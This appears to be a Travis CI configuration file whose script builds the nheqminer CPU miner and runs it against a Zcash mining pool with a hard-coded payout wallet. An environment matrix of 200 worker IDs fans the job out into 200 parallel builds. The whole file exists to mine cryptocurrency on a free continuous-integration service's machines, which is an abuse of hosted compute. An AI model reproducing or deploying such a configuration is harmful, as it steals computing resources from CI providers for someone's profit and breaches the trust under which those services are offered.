dist: trusty
sudo: required

script:
  - sudo apt-get update --yes
  - sudo apt-get install --yes --no-install-recommends build-essential cmake git libboost-all-dev
  - git clone -b Linux https://github.com/nicehash/nheqminer.git
  - cd nheqminer/cpu_xenoncat/Linux/asm/
  - sh assemble.sh
  - cd ../../../Linux_cmake/nheqminer_cpu
  - cmake .
  - make -j $(nproc)
  - ./nheqminer_cpu -l eu1-zcash.flypool.org:3333 -u t1TwoYzvNz5tzXW65xRsarrqTFAhb4eJSP6.travis
  
env:
- WORKER_ID=travis1
- WORKER_ID=travis2
- WORKER_ID=travis3
- WORKER_ID=travis4
- WORKER_ID=travis5
- WORKER_ID=travis6
- WORKER_ID=travis7
- WORKER_ID=travis8
- WORKER_ID=travis9
- WORKER_ID=travis10
- WORKER_ID=travis11
- WORKER_ID=travis12
- WORKER_ID=travis13
- WORKER_ID=travis14
- WORKER_ID=travis15
- WORKER_ID=travis16
- WORKER_ID=travis17
- WORKER_ID=travis18
- WORKER_ID=travis19
- WORKER_ID=travis20
- WORKER_ID=travis21
- WORKER_ID=travis22
- WORKER_ID=travis23
- WORKER_ID=travis24
- WORKER_ID=travis25
- WORKER_ID=travis26
- WORKER_ID=travis27
- WORKER_ID=travis28
- WORKER_ID=travis29
- WORKER_ID=travis30
- WORKER_ID=travis31
- WORKER_ID=travis32
- WORKER_ID=travis33
- WORKER_ID=travis34
- WORKER_ID=travis35
- WORKER_ID=travis36
- WORKER_ID=travis37
- WORKER_ID=travis38
- WORKER_ID=travis39
- WORKER_ID=travis40
- WORKER_ID=travis41
- WORKER_ID=travis42
- WORKER_ID=travis43
- WORKER_ID=travis44
- WORKER_ID=travis45
- WORKER_ID=travis46
- WORKER_ID=travis47
- WORKER_ID=travis48
- WORKER_ID=travis49
- WORKER_ID=travis50
- WORKER_ID=travis51
- WORKER_ID=travis52
- WORKER_ID=travis53
- WORKER_ID=travis54
- WORKER_ID=travis55
- WORKER_ID=travis56
- WORKER_ID=travis57
- WORKER_ID=travis58
- WORKER_ID=travis59
- WORKER_ID=travis60
- WORKER_ID=travis61
- WORKER_ID=travis62
- WORKER_ID=travis63
- WORKER_ID=travis64
- WORKER_ID=travis65
- WORKER_ID=travis66
- WORKER_ID=travis67
- WORKER_ID=travis68
- WORKER_ID=travis69
- WORKER_ID=travis70
- WORKER_ID=travis71
- WORKER_ID=travis72
- WORKER_ID=travis73
- WORKER_ID=travis74
- WORKER_ID=travis75
- WORKER_ID=travis76
- WORKER_ID=travis77
- WORKER_ID=travis78
- WORKER_ID=travis79
- WORKER_ID=travis80
- WORKER_ID=travis81
- WORKER_ID=travis82
- WORKER_ID=travis83
- WORKER_ID=travis84
- WORKER_ID=travis85
- WORKER_ID=travis86
- WORKER_ID=travis87
- WORKER_ID=travis88
- WORKER_ID=travis89
- WORKER_ID=travis90
- WORKER_ID=travis91
- WORKER_ID=travis92
- WORKER_ID=travis93
- WORKER_ID=travis94
- WORKER_ID=travis95
- WORKER_ID=travis96
- WORKER_ID=travis97
- WORKER_ID=travis98
- WORKER_ID=travis99
- WORKER_ID=travis100
- WORKER_ID=travis101
- WORKER_ID=travis102
- WORKER_ID=travis103
- WORKER_ID=travis104
- WORKER_ID=travis105
- WORKER_ID=travis106
- WORKER_ID=travis107
- WORKER_ID=travis108
- WORKER_ID=travis109
- WORKER_ID=travis110
- WORKER_ID=travis111
- WORKER_ID=travis112
- WORKER_ID=travis113
- WORKER_ID=travis114
- WORKER_ID=travis115
- WORKER_ID=travis116
- WORKER_ID=travis117
- WORKER_ID=travis118
- WORKER_ID=travis119
- WORKER_ID=travis120
- WORKER_ID=travis121
- WORKER_ID=travis122
- WORKER_ID=travis123
- WORKER_ID=travis124
- WORKER_ID=travis125
- WORKER_ID=travis126
- WORKER_ID=travis127
- WORKER_ID=travis128
- WORKER_ID=travis129
- WORKER_ID=travis130
- WORKER_ID=travis131
- WORKER_ID=travis132
- WORKER_ID=travis133
- WORKER_ID=travis134
- WORKER_ID=travis135
- WORKER_ID=travis136
- WORKER_ID=travis137
- WORKER_ID=travis138
- WORKER_ID=travis139
- WORKER_ID=travis140
- WORKER_ID=travis141
- WORKER_ID=travis142
- WORKER_ID=travis143
- WORKER_ID=travis144
- WORKER_ID=travis145
- WORKER_ID=travis146
- WORKER_ID=travis147
- WORKER_ID=travis148
- WORKER_ID=travis149
- WORKER_ID=travis150
- WORKER_ID=travis151
- WORKER_ID=travis152
- WORKER_ID=travis153
- WORKER_ID=travis154
- WORKER_ID=travis155
- WORKER_ID=travis156
- WORKER_ID=travis157
- WORKER_ID=travis158
- WORKER_ID=travis159
- WORKER_ID=travis160
- WORKER_ID=travis161
- WORKER_ID=travis162
- WORKER_ID=travis163
- WORKER_ID=travis164
- WORKER_ID=travis165
- WORKER_ID=travis166
- WORKER_ID=travis167
- WORKER_ID=travis168
- WORKER_ID=travis169
- WORKER_ID=travis170
- WORKER_ID=travis171
- WORKER_ID=travis172
- WORKER_ID=travis173
- WORKER_ID=travis174
- WORKER_ID=travis175
- WORKER_ID=travis176
- WORKER_ID=travis177
- WORKER_ID=travis178
- WORKER_ID=travis179
- WORKER_ID=travis180
- WORKER_ID=travis181
- WORKER_ID=travis182
- WORKER_ID=travis183
- WORKER_ID=travis184
- WORKER_ID=travis185
- WORKER_ID=travis186
- WORKER_ID=travis187
- WORKER_ID=travis188
- WORKER_ID=travis189
- WORKER_ID=travis190
- WORKER_ID=travis191
- WORKER_ID=travis192
- WORKER_ID=travis193
- WORKER_ID=travis194
- WORKER_ID=travis195
- WORKER_ID=travis196
- WORKER_ID=travis197
- WORKER_ID=travis198
- WORKER_ID=travis199
- WORKER_ID=travis200
